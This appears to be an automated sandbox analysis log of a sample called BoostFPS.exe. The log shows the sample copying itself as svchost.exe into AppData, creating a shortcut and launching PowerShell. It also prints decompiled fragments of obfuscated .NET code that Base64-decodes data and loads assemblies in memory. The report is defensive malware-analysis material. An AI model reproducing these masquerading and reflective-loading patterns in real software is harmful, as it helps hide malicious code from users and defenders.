Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\BoostFPS.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
Source: svchost.lnk.4.dr | LNK file: ..\..\..\..\..\svchost.exe
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\BoostFPS.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: BoostFPS.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: BoostFPS.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{b43LsePgKro8PAKsdWFwSRgXeS.ldbGRoDG4YflBvo1GqKNT8Ob7E,b43LsePgKro8PAKsdWFwSRgXeS._2yIMq7mdYoiSGzfjwifyX4cwzH,b43LsePgKro8PAKsdWFwSRgXeS.tgJNXlZgkSZOYf9AvkPdJ0ytaJ,b43LsePgKro8PAKsdWFwSRgXeS.brPiHMEBQvCGzrgJTWhfmTwx6s,cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.o2A5mxiy7d62WaZnPy3GmxAsRz4ZpWJ3M0mw()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WknvkUhNjgPqC1mZJN[2],cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.mMqBTb0LofCXALp773iWGGxrcYL8iOf1lz9TVkF9im1QHSwy2Qp6C84sN6cAiR81JcxH(Convert.FromBase64String(WknvkUhNjgPqC1mZJN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{b43LsePgKro8PAKsdWFwSRgXeS.ldbGRoDG4YflBvo1GqKNT8Ob7E,b43LsePgKro8PAKsdWFwSRgXeS._2yIMq7mdYoiSGzfjwifyX4cwzH,b43LsePgKro8PAKsdWFwSRgXeS.tgJNXlZgkSZOYf9AvkPdJ0ytaJ,b43LsePgKro8PAKsdWFwSRgXeS.brPiHMEBQvCGzrgJTWhfmTwx6s,cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.o2A5mxiy7d62WaZnPy3GmxAsRz4ZpWJ3M0mw()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WknvkUhNjgPqC1mZJN[2],cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.mMqBTb0LofCXALp773iWGGxrcYL8iOf1lz9TVkF9im1QHSwy2Qp6C84sN6cAiR81JcxH(Convert.FromBase64String(WknvkUhNjgPqC1mZJN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{b43LsePgKro8PAKsdWFwSRgXeS.ldbGRoDG4YflBvo1GqKNT8Ob7E,b43LsePgKro8PAKsdWFwSRgXeS._2yIMq7mdYoiSGzfjwifyX4cwzH,b43LsePgKro8PAKsdWFwSRgXeS.tgJNXlZgkSZOYf9AvkPdJ0ytaJ,b43LsePgKro8PAKsdWFwSRgXeS.brPiHMEBQvCGzrgJTWhfmTwx6s,cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.o2A5mxiy7d62WaZnPy3GmxAsRz4ZpWJ3M0mw()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{WknvkUhNjgPqC1mZJN[2],cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.mMqBTb0LofCXALp773iWGGxrcYL8iOf1lz9TVkF9im1QHSwy2Qp6C84sN6cAiR81JcxH(Convert.FromBase64String(WknvkUhNjgPqC1mZJN[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: _1zq9ibfpkpsokscxU0 System.AppDomain.Load(byte[])
Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: _1zq9ibfpkpsokscxU0
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR System.AppDomain.Load(byte[])
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: _1zq9ibfpkpsokscxU0 System.AppDomain.Load(byte[])
Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: _1zq9ibfpkpsokscxU0
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR System.AppDomain.Load(byte[])
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: _1zq9ibfpkpsokscxU0 System.AppDomain.Load(byte[])
Source: 0.2.BoostFPS.exe.251fc40.1.raw.unpack, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | .Net Code: _1zq9ibfpkpsokscxU0
Source: C:\Users\user\Desktop\BoostFPS.exe | Code function: 0_2_00007FF848DA00BD pushad ; iretd 0_2_00007FF848DA00C1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 4_2_00007FF848DA00BD pushad ; iretd 4_2_00007FF848DA00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF848C6D2A5 pushad ; iretd 8_2_00007FF848C6D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF848D800BD pushad ; iretd 8_2_00007FF848D800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 8_2_00007FF848E52316 push 8B485F94h; iretd 8_2_00007FF848E5231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF848C6D2A5 pushad ; iretd 11_2_00007FF848C6D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF848D800BD pushad ; iretd 11_2_00007FF848D800C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 11_2_00007FF848E52316 push 8B485F94h; iretd 11_2_00007FF848E5231B
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 21_2_00007FF848D900BD pushad ; iretd 21_2_00007FF848D900C1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 22_2_00007FF848DB00BD pushad ; iretd 22_2_00007FF848DB00C1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 23_2_00007FF848DA00BD pushad ; iretd 23_2_00007FF848DA00C1
Source: C:\Users\user\AppData\Roaming\svchost.exe | Code function: 24_2_00007FF848D700BD pushad ; iretd 24_2_00007FF848D700C1
Source: BoostFPS.exe | Static PE information: section name: .text entropy: 7.926723027968396
                  Source: BoostFPS.exe, KREREaf5y7YuM0yCltBL1aOyI5Yy16T9MMxdOrdO08a3tMGXNQCNV0oTCmPwJrOMb6GJ1MrKY0eKPJ6Qg4HLKBRSy3cVQWWeb.cs | High entropy of concatenated method names: '_1nv6xsW1urM51KjFSPwBcUyTAeRjRyF46vKXZMeFHs4A7PRGEsscBOjDn2Xncn36KOe5rDplWKrpqGiJThgNwowLnDEN6rPgg', 'jtTwwXEAHED9oqxfPQ9aqAl0UopKuwgC9Rp50rBfbSwU3q0YJkVFCb3WQl9BqnJYSij9rRCSWBxxxX12htBpfNo3pg9VBm5Wf', 'gF2fBNGaxlcrCYLIOZLMx28YLpFCshpxC0ei3XQYcDgENsx2k0M9XOayUdUBhRQNDSd3iYBwduak2VMqos4vwbgMfhvVRHvzl', 'TRo8s2i9LupJOU1g5dBnDcACrh4lvueIjb8yoxzZavQwZFhkCeeW6DHaaYz1eZQSaSEzReKPoXUeGLWjOL4wlHhZQ2rtzQUNp', '_6lY3QoPdC6sqzqd9qNzFgD4zr5QeS2874HFKe0yiXHnVjF5xxLufJqSExe8KWbXsh9ymCFoov0sPqI57LDbUIQ5kcnafKV5JA', 'mZJGnil2jrXOWrMebD0VfTI1TYhyijs49AfqByv', '_8pxTs4QG1U53CwZ4KZ4w1x4VhX5wxREgRmwtCL6', 'bH7TKT1kzsqFt43n0fyGx2qKw4iiPAE0ZT4Xr4G', 'wzR5JCtfvnEbCeD2PhhEFoXsxJvS9YURoKXyAVY', 'OWue4TRZnlqSL47JBDrBE747EN35Yf6LklfDHvF'
                  Source: BoostFPS.exe, sh0Wy3f9rsiwYQo33wxz2IicnooGc8DwvKLLKFNgivi2tV3gvLsTekeMpBSG6F8Cw.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'LBj743MyvjDny3gYviNDMZtdgA23vn7R2uhm8Vo', 'x5UKoLHPg1L40Tx6eE2xekbsG0iSWM2tPr1q5ro', '_6s1nVJnNlpXUqo9i4QhjcjOjLVc1ToF7Y3GpjAx', 'RNTW68hT7PoGRy7dpuTml0v5IvKS4XZZudnKmRd'
                  Source: svchost.exe.0.dr, CqayRAcK1MmI849tGL0QQPnNglzRe3g697BQHLFaS9cFPuAktUnTuC.cs | High entropy of concatenated method names: 'QvDyedJdVmV89O8MG5MqZbBxir79ANlQKelW97fRwFaP9Rl3tRSoFk', 'uXDa0StEMg6JtXVdMk5RW6wBVNWui0qCaRxcp0rxYfSjl3hB9GoE42', 'NN6vwYeEPVI2lX6BDH2Wf6Tc1gwVHk13PllyZgM9yajpNtsa6YFXM2', 'J7K01GgNoHQzps07B0', 'G5fPy8yAbA8cMwEkEe', 'vb5mCm1nJdZsjrscjZ', 'mo0sVWQNNC1jWRH0F6', 'gnBFijogF8HOO7ZjOO', '_1GZM1YxV85WBqfYxth', 'Ng456IfZauO7u7ncHk'
                  Source: svchost.exe.0.dr, b43LsePgKro8PAKsdWFwSRgXeS.cs | High entropy of concatenated method names: 'pJhO7lpTUwXiqq6Mnv4wBV39ZravpHk', 'tUwF4Orj4rPSIM9cvZUuxx33o9AaMtI', 'LxlIVpQL005ShxlFHTbw4U453EmHFdr', 'hqDJFOBBQNdYEafop5fisn27kKFznbF'
                  Source: svchost.exe.0.dr, dJGrFzZRnm6nhZzk5c7khNtk9BuO2lukaMR55NFFW.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_00dL45P1ktComGL5U4dAnLBZZNpISoM', 'Rsb29rsd4Cjz1zlP1rLkiSBao2paROq', '_2jniG1mTDJhcQv68bhchvVTi1xAlk4j', 'X8UGiLhrGAgGHfQ0k4CqAHvnqfeSw97'
                  Source: svchost.exe.0.dr, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.cs | High entropy of concatenated method names: 'Bqr9IApmOTP4nl7Vt7e9zCVwOIzyM1affYfK', 'ePFHuDJi8YM5vgvRtm4d8P3bIVS5ZoRQufO5', 'RDQeaHUygmLZ4XlSIQDW2JEoPsWqBfTJplew', 'XDTQpIlZmBdbgOxqPX6S59wFMtenm0S4ygPM', '_6NU4mk3vmSnGJ60tIcKynuFbayPh8B6MKfSR', 'Gzl9UVEXWKpfugyYZH8JHiZw7riCJHbIYGGx', 'yv237CSvGbeP3sVaYuovmEocUT3HDMM60hip', 'jMdrQxh8jarANIUZWoYIkVBWPqR9sHCVcH85', 'hRwg9qRUbT20SboWQNk9EHmjP589muWAfD8V', '_2KGgiMKOtakioIjRKfHvGo5radn0LNEq0JBU'
                  Source: svchost.exe.0.dr, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.cs | High entropy of concatenated method names: 'KUGRFX7NzbXI3dF0wrdURHUtG0zaBv88MtAS', 'tOO2Z8qOEgWLfHluOXChWdvCxwZiRsOYCgklHDjJBFONK6jcyMxSe8mQaa', 'd9waWOcLbOPbOe7dEsf7sOhuxOMofzlxq6uBRjro1Ofq4CfDh2t003LpId', 'mguuZjrCd716Ke7x2VaTOvT9C267EXZyAd9iIiRhKZgFpLUCSZFb0OMsBr', 'KFKupFPsRoJOg7guPRcWmBr92jiEr24qAscLgapCeBrOyl3xdjl5qIJDiHuKuJuaLwZmH2hAbbEuo5WeCPH3KoMVf5Q'
                  Source: svchost.exe.0.dr, 8IQB900HXYRJQlSr78JTfor2tc.cs | High entropy of concatenated method names: 'TKQFizhs2lVNjSAlf0Q6tXZS9v', 'GLvUvE5Lbzlydp5PY3jqcSPc2C', 'UGiY4f3pvEofg6Iulz9u3CYCfe', 'tsAJnLIXUMiQta7muY5V2eRXUJYTBobZmSC8woLmV1ABLMNiJKCx2FA7ILp', 'XgS9lV9wP0OGaskWn9Y4U2tdyyY0ScMgnWouvmgUBtf78ym6Hm0dmLmg6Bc', 'NCQJtvrYdEzQevyWWGgB99RksUoSpZE67tNLNlksT40uqOvu7xHCWbWxxrD', 'qSCmv1R3jGNemiDUTJ474IWiQCSfBTDKtnLSfE04Sqm5yTJvS7wcZPfnEX5', 'r4fxv6B01YN2ArbEBxeUYIRc0wVYyAE29pUS9HqR705MNSu9fieq70gGc8Q', 'JH4TehWKGyhxn5JmfBZY4DPaSj4jwTSOdvroJu197cOXlTXsXW3yP18w2P7', 'YBXKyVGqnUX5Mj4MuhZCDMMKfYCfR8W4TJapIts56pYaISM0WSIA8XRveMM'
                  Source: svchost.exe.0.dr, C3tzO69S7Io0iqQUFZ.cs | High entropy of concatenated method names: 'n9L1SiSEKnOJLPTxOX', 'EdBvOJPjc5U4FwQjZPHehC50grzSW4u0TEwsTvnjg', 'KvIjvXDwWu1qObxmvBuHAnLOlPZ5cVMT9DKAREzuB', 'TWEQgKKNlYxIV2sXjt3GXoQHItjA7DOEipgMvF6G8', '_6kBkFN74HE0ZoUbVwwgfs9Ac7Loe5XbCdg0hpnRMx'
                  Source: svchost.exe.0.dr, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | High entropy of concatenated method names: 'YLBldLktCgFxThvN3oxSQ7feTLXUeDESnntmrT7ODqPx', 'txd84qUAtgwYBo9hQ59Qx4WG76651dxKXzDgjQ4RQjNl', 'DFIl5zQJ9Msj8WXgFZlHlDi4yEdc04TaUxEaDb7Y7PxZ', 'RMTYoFcDRWXDbOJy8TYimVj3U1FCB7brlYSUefzw1g3a', 'NnvXBw8RFHbkMePGrLNQdXa5TAnrdnZu2QVIin3vo2mi', '_6nBIcXOrZOwCX0Qc7WU3lRESKofh470ADvsaGoaVdV97', 'C5FyNGPKc9mEwULry8gJ9d5YWdaA6qzxna3qRkyZaZBE', 'jfY0sMtntiNWfzbhmZ9M7BrBRw844THn8sm8wArbNBV4', 'vVaYHCq4glB5AHmXJ7Jtg5uBfww3j21bhxiAxnwh7PWb', '_4aDgrCBIP20LRSew2k3GkegkMNmpKebAwjrrBjmXFy4i'
                  Source: svchost.exe.0.dr, 7JvHuWPw1GACQFV6RkGOPBlb2yE8r5a5qayCygvYw9HkC6ls1bwfCuTp8eL7K7yAXlVdxclqrSk5bcvZT2QmhwOVf97ctC.cs | High entropy of concatenated method names: 'HTgL90ABMji8QHmbo3nJuM4cUcC0fXQjBtEKZexQI8EGW8SShhROfFbjk3KSm20q60evJLiweHt8kiQNONhRhYdkZzwFWr', '_1mBzvp4cKSuOZksJRJnqpOopSrVYJ83f8Sjc', 'pOndutOPfJ53dQtjcy1aV3cT75K6Si0zBS5C', '_9cYhnzdcVkH81UksXA1GBmOtmUpqremzL8pn', '_7j5fffhqLEYuO8KzIcszij2w6ldIu94YG4Fl6fx2CcVVUnTKZBHIi4pTaJ', 'YTL7nT9jYE47vjLOWFsGpQLCuJtclTzNf4E1iwxBMs6ipah79j1QamQskK', '_71MnawkND25UImg5RD8vnC6d9aHxHxZTuWVzhJnMTYaqXoxXTOiVmaKL8J', 'TJ1FZdlbjXCZFX1IPpa1c3qAKhddtgauOzJCNgYoI2Ir3AZqppeBPub0H9', 'tjgCwv0QJ4BVSD9kaFIeI8jz56aW67sB6nV49xAfgDpKCPWJXUHXeDMKYs', 'tJbvRiG4i7af79ROK8siEac83raDF0n1DsB9y8YDAkoFe1to0GVorRnfHV'
                  Source: svchost.exe.0.dr, fTao5gWD0t2iSxXg7i.cs | High entropy of concatenated method names: 'qI9aCiC0DxmzgxmHI0', 'cOuY6dyf6DfrDzWT3y', 'PLaqPXtPvSAygMwypD', '_1sn6RRw7e5kdfUFxZE', 'iVJBOz249xWFhoHIO5', 'YhnePqRO3hAfnGAzIS', 'p5KZLqACgdwca7gTXh', 'Q2ZPJVjtIoVG6rIKfV', 'iOyNtBPWFmH5jVtghW', 'IRWFiTmFGLsH6shGQN'
                  Source: svchost.exe.0.dr, GGwNn26hqt56nWrnLoDsuv3m1BERoMDpFnrEob0YhjSQLNOMwwHzRkIiDnABcfvJTfMScAcofJS1.cs | High entropy of concatenated method names: 'TKwaZYczhZHeBkBjnC4FAoU1v6oSYDF5GuLQljhkge5uI2tFXsXoeVQTeYMP6QThAP9cnTqcITBz', 'GF3lcLM8gkA59GYRdVCDxJUHFJTEz7yznGGABOrBCy2qVeBKwwysawb8UzXkskWaQt5Kvf014xDR', '_8EDhV4r1m7ktQq4wQR3GzHqoSSy9jPDSM5qcZqWUVNQVP2yHPxCPV4qBisoqGQn3hPC4t0y2pPaE', 'yTPMF1iSmPRXuB72iFyBMmvVRxKRIk4nSoc9ux8matyalFmlvtS5KcQxAU5xsuSBrEG1f1NvolnF', 'UkmrxZXoVvHGSMGrciskGfNrY1Cl1cjtirYftIpYUvqGiFuiCUIEkmv6Q9fOWmqguYzYxC4IKbtr', '_4QG4gsJdGffwuq0L0kkGpUCrDdilwejzvTlcNpw2kcGK50CttEoy8lwAPt8MvWn5NORrjOwDQONb', '_7UhVED4iIc67RFsqbWeRiBO0nBAGIOEjIygEnOyqcNspHHxLOE9M8be4KmOxADoce37HKdvMctaB', 'bWMXJsCBt7jOLGkTUsnkg6yDt8xKZGhW1i7k8HVoLIwGuzsI22J1zcHROwWFNBv2qDzVvE4f3nx8', '_965r8GGj19n7G4kv0H', 'UsdMBU6FoXifoBBCSC'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, CqayRAcK1MmI849tGL0QQPnNglzRe3g697BQHLFaS9cFPuAktUnTuC.cs | High entropy of concatenated method names: 'QvDyedJdVmV89O8MG5MqZbBxir79ANlQKelW97fRwFaP9Rl3tRSoFk', 'uXDa0StEMg6JtXVdMk5RW6wBVNWui0qCaRxcp0rxYfSjl3hB9GoE42', 'NN6vwYeEPVI2lX6BDH2Wf6Tc1gwVHk13PllyZgM9yajpNtsa6YFXM2', 'J7K01GgNoHQzps07B0', 'G5fPy8yAbA8cMwEkEe', 'vb5mCm1nJdZsjrscjZ', 'mo0sVWQNNC1jWRH0F6', 'gnBFijogF8HOO7ZjOO', '_1GZM1YxV85WBqfYxth', 'Ng456IfZauO7u7ncHk'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, b43LsePgKro8PAKsdWFwSRgXeS.cs | High entropy of concatenated method names: 'pJhO7lpTUwXiqq6Mnv4wBV39ZravpHk', 'tUwF4Orj4rPSIM9cvZUuxx33o9AaMtI', 'LxlIVpQL005ShxlFHTbw4U453EmHFdr', 'hqDJFOBBQNdYEafop5fisn27kKFznbF'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, dJGrFzZRnm6nhZzk5c7khNtk9BuO2lukaMR55NFFW.cs | High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_00dL45P1ktComGL5U4dAnLBZZNpISoM', 'Rsb29rsd4Cjz1zlP1rLkiSBao2paROq', '_2jniG1mTDJhcQv68bhchvVTi1xAlk4j', 'X8UGiLhrGAgGHfQ0k4CqAHvnqfeSw97'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, cTYSN5jhhGq4vLfc0NBji3tBWk2QbmGaDerv.cs | High entropy of concatenated method names: 'Bqr9IApmOTP4nl7Vt7e9zCVwOIzyM1affYfK', 'ePFHuDJi8YM5vgvRtm4d8P3bIVS5ZoRQufO5', 'RDQeaHUygmLZ4XlSIQDW2JEoPsWqBfTJplew', 'XDTQpIlZmBdbgOxqPX6S59wFMtenm0S4ygPM', '_6NU4mk3vmSnGJ60tIcKynuFbayPh8B6MKfSR', 'Gzl9UVEXWKpfugyYZH8JHiZw7riCJHbIYGGx', 'yv237CSvGbeP3sVaYuovmEocUT3HDMM60hip', 'jMdrQxh8jarANIUZWoYIkVBWPqR9sHCVcH85', 'hRwg9qRUbT20SboWQNk9EHmjP589muWAfD8V', '_2KGgiMKOtakioIjRKfHvGo5radn0LNEq0JBU'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, NFaIfEAolBHm9leRATPwGPwni5MWFnZCQHqP.cs | High entropy of concatenated method names: 'KUGRFX7NzbXI3dF0wrdURHUtG0zaBv88MtAS', 'tOO2Z8qOEgWLfHluOXChWdvCxwZiRsOYCgklHDjJBFONK6jcyMxSe8mQaa', 'd9waWOcLbOPbOe7dEsf7sOhuxOMofzlxq6uBRjro1Ofq4CfDh2t003LpId', 'mguuZjrCd716Ke7x2VaTOvT9C267EXZyAd9iIiRhKZgFpLUCSZFb0OMsBr', 'KFKupFPsRoJOg7guPRcWmBr92jiEr24qAscLgapCeBrOyl3xdjl5qIJDiHuKuJuaLwZmH2hAbbEuo5WeCPH3KoMVf5Q'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 8IQB900HXYRJQlSr78JTfor2tc.cs | High entropy of concatenated method names: 'TKQFizhs2lVNjSAlf0Q6tXZS9v', 'GLvUvE5Lbzlydp5PY3jqcSPc2C', 'UGiY4f3pvEofg6Iulz9u3CYCfe', 'tsAJnLIXUMiQta7muY5V2eRXUJYTBobZmSC8woLmV1ABLMNiJKCx2FA7ILp', 'XgS9lV9wP0OGaskWn9Y4U2tdyyY0ScMgnWouvmgUBtf78ym6Hm0dmLmg6Bc', 'NCQJtvrYdEzQevyWWGgB99RksUoSpZE67tNLNlksT40uqOvu7xHCWbWxxrD', 'qSCmv1R3jGNemiDUTJ474IWiQCSfBTDKtnLSfE04Sqm5yTJvS7wcZPfnEX5', 'r4fxv6B01YN2ArbEBxeUYIRc0wVYyAE29pUS9HqR705MNSu9fieq70gGc8Q', 'JH4TehWKGyhxn5JmfBZY4DPaSj4jwTSOdvroJu197cOXlTXsXW3yP18w2P7', 'YBXKyVGqnUX5Mj4MuhZCDMMKfYCfR8W4TJapIts56pYaISM0WSIA8XRveMM'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, C3tzO69S7Io0iqQUFZ.cs | High entropy of concatenated method names: 'n9L1SiSEKnOJLPTxOX', 'EdBvOJPjc5U4FwQjZPHehC50grzSW4u0TEwsTvnjg', 'KvIjvXDwWu1qObxmvBuHAnLOlPZ5cVMT9DKAREzuB', 'TWEQgKKNlYxIV2sXjt3GXoQHItjA7DOEipgMvF6G8', '_6kBkFN74HE0ZoUbVwwgfs9Ac7Loe5XbCdg0hpnRMx'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 5bSnz6cfqSVZXBtixPetv5TwrESY44FTC6v1Y4vFa0it.cs | High entropy of concatenated method names: 'YLBldLktCgFxThvN3oxSQ7feTLXUeDESnntmrT7ODqPx', 'txd84qUAtgwYBo9hQ59Qx4WG76651dxKXzDgjQ4RQjNl', 'DFIl5zQJ9Msj8WXgFZlHlDi4yEdc04TaUxEaDb7Y7PxZ', 'RMTYoFcDRWXDbOJy8TYimVj3U1FCB7brlYSUefzw1g3a', 'NnvXBw8RFHbkMePGrLNQdXa5TAnrdnZu2QVIin3vo2mi', '_6nBIcXOrZOwCX0Qc7WU3lRESKofh470ADvsaGoaVdV97', 'C5FyNGPKc9mEwULry8gJ9d5YWdaA6qzxna3qRkyZaZBE', 'jfY0sMtntiNWfzbhmZ9M7BrBRw844THn8sm8wArbNBV4', 'vVaYHCq4glB5AHmXJ7Jtg5uBfww3j21bhxiAxnwh7PWb', '_4aDgrCBIP20LRSew2k3GkegkMNmpKebAwjrrBjmXFy4i'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, 7JvHuWPw1GACQFV6RkGOPBlb2yE8r5a5qayCygvYw9HkC6ls1bwfCuTp8eL7K7yAXlVdxclqrSk5bcvZT2QmhwOVf97ctC.cs | High entropy of concatenated method names: 'HTgL90ABMji8QHmbo3nJuM4cUcC0fXQjBtEKZexQI8EGW8SShhROfFbjk3KSm20q60evJLiweHt8kiQNONhRhYdkZzwFWr', '_1mBzvp4cKSuOZksJRJnqpOopSrVYJ83f8Sjc', 'pOndutOPfJ53dQtjcy1aV3cT75K6Si0zBS5C', '_9cYhnzdcVkH81UksXA1GBmOtmUpqremzL8pn', '_7j5fffhqLEYuO8KzIcszij2w6ldIu94YG4Fl6fx2CcVVUnTKZBHIi4pTaJ', 'YTL7nT9jYE47vjLOWFsGpQLCuJtclTzNf4E1iwxBMs6ipah79j1QamQskK', '_71MnawkND25UImg5RD8vnC6d9aHxHxZTuWVzhJnMTYaqXoxXTOiVmaKL8J', 'TJ1FZdlbjXCZFX1IPpa1c3qAKhddtgauOzJCNgYoI2Ir3AZqppeBPub0H9', 'tjgCwv0QJ4BVSD9kaFIeI8jz56aW67sB6nV49xAfgDpKCPWJXUHXeDMKYs', 'tJbvRiG4i7af79ROK8siEac83raDF0n1DsB9y8YDAkoFe1to0GVorRnfHV'
                  Source: 0.2.BoostFPS.exe.250c800.2.raw.unpack, fTao5gWD0t2iSxXg7i.cs | High entropy of concatenated method names: 'qI9aCiC0DxmzgxmHI0', 'cOuY6dyf6DfrDzWT3y', 'PLaqPXtPvSAygMwypD', '_1sn6RRw7e5kdfUFxZE', 'iVJBOz249xWFhoHIO5', 'YhnePqRO3hAfnGAzIS', 'p5KZLqACgdwca7gTXh', 'Q2ZPJVjtIoVG6rIKfV', 'iOyNtBPWFmH5jVtghW', 'IRWFiTmFGLsH6shGQN'
